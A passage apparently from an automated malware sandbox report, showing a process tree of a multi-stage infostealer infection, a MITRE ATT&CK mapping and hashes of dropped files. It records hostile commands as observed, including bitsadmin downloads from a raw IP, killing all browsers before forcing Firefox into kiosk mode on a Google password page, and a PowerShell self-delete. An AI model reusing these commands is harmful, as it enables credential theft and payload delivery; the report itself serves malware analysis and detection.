    - - C:\Users\Admin\AppData\Local\Temp\1011459001\596fe820ba.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011459001\596fe820ba.exe"
        5⤵
        
        PID:1424
      - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
        
        "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
        6⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
        7⤵
        
        PID:5044
        
        C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
        7⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
        8⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 680
        9⤵
        Program crash
        
        PID:5232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 1312
        9⤵
        Program crash
        
        PID:5768
        
        C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
        7⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
        8⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
        7⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
        7⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
        8⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
        9⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"
        7⤵
        
        PID:732
        
        C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
        7⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\is-1QSPF.tmp\newwork.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1QSPF.tmp\newwork.tmp" /SL5="$80062,3467779,54272,C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
        8⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\1005158001\c65baa46a8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005158001\c65baa46a8.exe"
        7⤵
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\1005159001\eb296a2e83.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005159001\eb296a2e83.exe"
        7⤵
        
        PID:5428
    - - C:\Users\Admin\AppData\Local\Temp\1011591001\c7dcaa047e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011591001\c7dcaa047e.exe"
        5⤵
        
        PID:4696
    - - C:\Users\Admin\AppData\Local\Temp\1011596001\4ed548cd90.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011596001\4ed548cd90.exe"
        5⤵
        
        PID:1120
    - - C:\Users\Admin\AppData\Local\Temp\1011597001\3dad40f22f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011597001\3dad40f22f.exe"
        5⤵
        
        PID:5460
    - - C:\Users\Admin\AppData\Local\Temp\1011598001\a87e5c6725.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011598001\a87e5c6725.exe"
        5⤵
        
        PID:5884
    - - C:\Users\Admin\AppData\Local\Temp\1011599001\0d166dddce.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011599001\0d166dddce.exe"
        5⤵
        
        PID:1144
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        Kills process with taskkill
        
        PID:1880
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        Kills process with taskkill
        
        PID:4452
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        Kills process with taskkill
        
        PID:5324
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        Kills process with taskkill
        
        PID:5432
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        Kills process with taskkill
        
        PID:5652
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:1148
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:4864
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1864 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0eec444f-e62a-4ea3-b83b-c42cdf13b711} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" gpu
        8⤵
        
        PID:4564
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2416 -parentBuildID 20240401114208 -prefsHandle 2408 -prefMapHandle 2396 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b028822-2ee1-42c7-8060-21eb5cf4238c} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" socket
        8⤵
        
        PID:5792
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 1 -isForBrowser -prefsHandle 3180 -prefMapHandle 3104 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {696d63a4-393a-4874-9699-b02d89bc781c} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:816
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3932 -childID 2 -isForBrowser -prefsHandle 3980 -prefMapHandle 3976 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b08c0bec-187a-412e-96e8-6c5029815444} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:672
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4592 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4584 -prefMapHandle 4580 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {976476f7-f078-4f49-aa8d-d04229dc91e6} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" utility
        8⤵
        
        PID:5784
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5344 -prefMapHandle 5384 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8445a3f7-9b8c-4593-92cb-da97cb769d82} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:4960
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5624 -childID 4 -isForBrowser -prefsHandle 5616 -prefMapHandle 5424 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {791a45fc-62f0-4d16-94d9-f6cda0bbad32} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:4040
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5752 -childID 5 -isForBrowser -prefsHandle 5520 -prefMapHandle 5528 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6830b21e-4bd1-4815-bb89-792fada10df6} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:3960
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5716 -childID 6 -isForBrowser -prefsHandle 5940 -prefMapHandle 5632 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6c1dc53-137a-4778-bfd9-4fbe0a2df6e4} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:5656
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5796 -childID 7 -isForBrowser -prefsHandle 5748 -prefMapHandle 5156 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe5c7b22-4d25-4535-a49b-2c003c1ae64b} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:5652
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 8 -isForBrowser -prefsHandle 5772 -prefMapHandle 5704 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f5409a7-6bf2-4f90-9176-422cf68dd63b} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:5748
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 9 -isForBrowser -prefsHandle 5684 -prefMapHandle 5668 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {444732d8-e96b-4e34-b626-4a42583f7b78} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:5744
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5808 -childID 10 -isForBrowser -prefsHandle 5540 -prefMapHandle 5776 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6913ff33-5cd3-4b7d-afc4-4c0066ca39fe} 4864 "\\.\pipe\gecko-crash-server-pipe.4864" tab
        8⤵
        
        PID:1888
    - - C:\Users\Admin\AppData\Local\Temp\1011600001\3d5e2e7456.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011600001\3d5e2e7456.exe"
        5⤵
        
        PID:1440
    - - C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"
        5⤵
        
        PID:5460
      - C:\Windows\SysWOW64\ping.exe
        
        ping -n 1 8.8.8.8
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3700
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
        6⤵
        Download via BitsAdmin
        
        PID:5324
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolwx.rar" "C:\Users\Admin\AppData\Local\Temp\jstsolwx.rar"
        6⤵
        Download via BitsAdmin
        
        PID:5844

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2432

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2444

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:212
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- - C:\Windows\system32\PING.EXE
    "C:\Windows\system32\PING.EXE" 127.1.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3628 -ip 3628
1⤵
PID:732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2908 -ip 2908
1⤵
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2908 -ip 2908
1⤵
PID:5744

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
PID:3568

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
PID:5176

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
1⤵
PID:5860
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:4432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1004
- - C:\Windows\system32\PING.EXE
    "C:\Windows\system32\PING.EXE" 127.1.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2576

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
1⤵
PID:2032

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
1⤵
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3876 -ip 3876
1⤵
PID:5828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Authentication Process

T1556

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BGIJEGCGDGHDHIDHDGCB

Filesize
11KB

MD5
2dd7b552a456d440f571c49e7f4cbc9d

SHA1
f4d6346b48c97f4a45452aa361908fac08de44df

SHA256
f9fc2dcef1037864706d3ae64a1a5b5661cacbb9a694435e76d670cfa91a5684

SHA512
2aba193381b8d70f476746c35974710197eaa20684ec8a959638fb56d49a573fb634d6622bb115d2c23c859a6853bd6e31ed580f86f7d6319fe020d9b4dad73e

Download Submit
C:\ProgramData\CAEHCFCB

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\ProgramData\DHCBAEHJ

Filesize
114KB

MD5
9a3be5cb8635e4df5189c9aaa9c1b3c0

SHA1
9a7ce80c8b4362b7c10294bb1551a6172e656f47

SHA256
958f70959a70caf02c0063fe80f12c4d4d3f822a9fd640a6685c345d98708c26

SHA512
5c538513eba7ebaf7028b924d992b4c32ca323ad44f7a31e21970ed6852ea8b54cf71b2f811e8bf97f2744ee151e001ea52ba43b61cd032cc5a4c886292aac65

Download Submit
C:\ProgramData\freebl3.dll

Filesize
28KB

MD5
75de347f59a479dddcd9645d1f4507be

SHA1
6b3c5dd769eed0c6461e56f2f510e23cad302ab6

SHA256
31086f6aa44c698bc931176979fbb809ec5147693321c4e00c83a8861da91dfe

SHA512
3df7cade62f3151962a245c133f45c1457a903aaeab78753b8b7858e98c15412a97c4d5adab7f179b9d631306f171c25256fab57426ea659f6f16eec5ea3ff3b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\msvcp140.dll

Filesize
439KB

MD5
5ff1fca37c466d6723ec67be93b51442

SHA1
34cc4e158092083b13d67d6d2bc9e57b798a303b

SHA256
5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

SHA512
4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
1bfb36040c116fe9cc5ca8d4d6296f8b

SHA1
7b981d4d18608a9d817df97c80338c7f1f7495d9

SHA256
d153e99dc56f7caf6d00d0edbf5120b2a5860ff4bfa51e3a4388f26ce2b1e814

SHA512
cec559e3f88b3da14106be0113ec45337e06f133ffc3f038b4d465648e805159b20df9b83c5460ba82812cdb86708dbd4d7dda1049da341a8cf708cb59d99659

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
938ffc2cba917b243d86b2cf76dcefb4

SHA1
234b53d91d075f16cc63c731eefdae278e2faad3

SHA256
5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

SHA512
e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
443a627d539ca4eab732bad0cbe7332b

SHA1
86b18b906a1acd2a22f4b2c78ac3564c394a9569

SHA256
1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

SHA512
923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
99afa4934d1e3c56bbce114b356e8a99

SHA1
3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

SHA256
08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

SHA512
76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7d188bef379d42e6d26a78bf334eb231

SHA1
3b74511c70cd55dc5e05a2b9b96c5ec484a4efc0

SHA256
59ba2dfef75a92c25b34de1a524779ef0c249ef32bb2222cc44c22c73d3f7b00

SHA512
6dc5959f94a49f052d94e63e0db3281373c413accfa394d22a3d3075d35ec22f5c54e0ab40e3f70a8a4bfddad756ea18481175e0d0205c42187f8a0e7b0ef0dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6IJLDY7V\download[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
20KB

MD5
0eb1246bc88ba203098b6a0bcec784f9

SHA1
86c43201ce1e58e98f08d81d5cccfeef09c18e34

SHA256
9b4a1a2c7b521c90ded9f0150e96d186366844adf962beebede667bf9638e092

SHA512
7b39310af16d3e77d4f162c1173b7885f2dbfd3e615fe81ef002d1118b443e736013ae31eedd1f865d1eea56626fdcf21dbf034b3666bec5d42d66b3afd0986f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
fb1f4727e62917f314a5e5a0f2dd69b1

SHA1
9d8c33c7fcca7af960cb330b0cc4717093f67565

SHA256
8c91b3c3cfaaf200da0fc6b3d111d0e27b0812e906c256c22bc18701e24857e2

SHA512
f19becb06b82d55e554ef8611bc3a4d714483c1fdc05d491e432b8ffc9ac9c094c8b7f562a09b2f81dac2d20b68d7909331d3faa634732885846138bbb90a2e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
52fbdce5d18ca74824b26e459a1b1a19

SHA1
9f80e921e6cb2287a6b98639d05a9b30e8cd4984

SHA256
29088401141ee21520c7eea7288468d0b2fcc00d24c409ad86ab5db35c87dce3

SHA512
33cdb55d068e535c10f24995f5c0d156c0c69e557356ffbef9cfb61b9e65b59306e81b34e478096a374591439109e4ee174e9a2c6c0f3a466e4db409d1a31f60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
8c8e538bd52e34c646cf78a085cac7d3

SHA1
84c6edae7cc206eba20d129aeaf58b8ae16c4d2e

SHA256
ef465690ac26a74a2e6cb32271e63d003d371427acdc5803df96746a5b03eedf

SHA512
02849dfe2b12d0f4935e9e01d58a679c2b9414a9e22549ba1d87407a53952651609cd113e034f0a7e48127f5e2bfcfb177729e4a3a2609d1431d94e439c1f406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
0eff5ee83ad25b232781f630d167a029

SHA1
50314c43f0cc190ad6899500dfec5ba1c4fdbb31

SHA256
e4e2874707d5c414155da422df0372968027cfc7442b15f796c1a38bab5b6c4f

SHA512
955fb777a3512ff760835d3251868062d744af394693e6109392c59d5b35cea248ca02b635f95163112a4ca7d6f65beba7023812e1a7fe2e13f1c59cb824832b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
2e4a0f685f3bc6c69e712978afe1fc66

SHA1
ff8e14e5ba2517013292547a982c807417c3364e

SHA256
beac30593e0319866995f32ddd1aee2bca5ef7d72842a251239494787aabdd72

SHA512
4f764f852c3e1f67ae4220642250ae2968d089143b26e38eddc03795ce39202f19d361ab2225403a0d847f0ccc13b53e8a92b4a64ee90ffff8f373d866c05d48

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json

Filesize
19KB

MD5
f521b1551545ca345a98141a1387127c

SHA1
9d61135bc85c5cdbb90ef3745a73aecd42211e18

SHA256
9dd67f7ad55f0e419c747cd8d26b4a3d02be0a24c6c7aa726fbca8000d64ec0d

SHA512
